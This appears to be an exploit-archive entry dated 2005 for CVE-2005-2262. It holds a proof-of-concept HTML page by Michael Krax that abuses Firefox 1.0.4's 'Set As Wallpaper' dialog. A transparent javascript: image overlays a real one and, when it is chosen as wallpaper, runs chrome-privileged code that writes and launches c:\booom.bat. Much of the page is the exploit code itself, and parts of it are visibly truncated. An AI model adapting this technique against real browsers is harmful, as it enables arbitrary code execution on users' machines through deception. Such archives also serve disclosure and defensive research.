Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution

Related Vulnerabilities: CVE-2005-2262  
Publish Date: 13 Jul 2005
Author: Michael Krax
                // Exploit by Michael Krax
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<title>Firewalling - Proof-of-Concept</title>
function stopload() {
// in some cases the javascript url never stops to load
// therefore we force a stop after the real image got loaded
<div style="font-family:Verdana;font-size:11px;">

<div style="font-family:Verdana;font-size:15px;font-weight:bold;">
Firewalling - Proof-of-Concept</div>
<div style="width:600px">
The "Set As Wallpaper" dialog takes the image url as a parameter without validating it.
This allows to execute javascript in chrome and to run arbitrary code.
By using absolute positioning and the moz-opacity filter an attacker can easily fool the
user to think he is setting a valid image as wallpaper.
Right click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file
that shows a directoy listing in a dos box (Windows only).

<div style="position:relative; width:300px; height:250px;">
<img src="javascript:/*-----------------------------*/eval('if(document.location.href.
(file,0x04|0x08|0x20,420,0);output=\'@ECHO OFF\\n:BEGIN\\nCLS\\nDIR\\nPAUSE
();}else{void(0)}')" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:2; -moz-opacity:0;">
<img src="" width="300" height="250" alt="" border="0" style="position:
absolute; left:0px; top:0px; z-index:1;" onload="stopload()">


# [2005-07-13]